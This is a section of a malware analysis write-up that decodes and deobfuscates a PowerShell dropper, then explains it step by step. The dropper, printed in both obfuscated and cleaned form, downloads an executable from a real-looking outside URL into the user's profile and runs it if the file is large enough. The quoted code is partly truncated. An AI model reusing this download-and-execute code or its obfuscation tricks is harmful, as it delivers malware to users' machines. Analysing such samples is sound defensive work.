Dropper analysis

Whole script was encoed in Base64. In order to decode it I used this PowerShell script:

$EncodedString = get-content Base64String.txt
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EncodedString )) | Out-File -Encoding "ASCII" Decoded.txt

As input the script takes the encoded string from Base64String.txt, decodes it and saves result in Decoded.txt file.

Dropper’s code looked like that:

<# https://www.microsoft.com/ #> $Refined_Plastic_Soapzpp='Bordersodi';$realtimevfb = '126';
$back_upjvi='Berkshirekwz';$Plazakpi=.('new-'+'ob'+'ject') NEt.WebCLieNT;
$Clubomb='Estateswjs';foreach($Music__Gamespmu in $Dynamicqmb){try{$Plazakpi."dO`wN`lOa`dfiLE"($Music__Gamespmu, $middlewareltk);
$Applicationsiqr='Grocerytiw';If ((&('Get'+'-I'+'tem') $middlewareltk)."LE`NgTh" -ge 35609) 

It was also obfuscated so I deobfuscated it (here it was much simpler).

<# https://www.microsoft.com/ #> 
$file_name = '126';
$file_path = $ENV:USERPROFILE;
$file_full_path = $file_path + '\' + $file_name + '.exe';

$web_client = .('new-object') NET.WebClient;
$url_list = 'http://www.pieceofpassion.net/0xrnl3/a27xm99fgd_on7xp-31134189/

foreach ($url in $url_list) {
try {
    $web_client.DownloadFile($url, $file_full_path);
    If ((&('Get-Item') $file_full_path)."Length" -ge 35609) {
} catch {}

Explanation is presented below:

  1. The result file is 126.exe, that file will be created in user home directory what is pointed by file_full_path.
  2. Then WebClient object is created which allows for sending and recieving data identified by URI identifier. (‘.’ is a call operator)
  3. url_list is an array which contains URI identifiers. Split function separates URIs by the ‘@’ character and places them in the next indexes of array.
  4. In for loop WebClient object tries to download the content of 126.exe file from sites stored in url_list.
  5. After each attempt to download the content, the script checks a size of resulted file. If size of that file is greater than 35609 bytes, the file is executed.

Table of content:

  1. Environment configuration
  2. Initial analysis
  3. Macro analysis
  4. Dropper analysis
  5. Detonation
  6. Domain analysis
  7. Detonation ver. 2
  8. Summary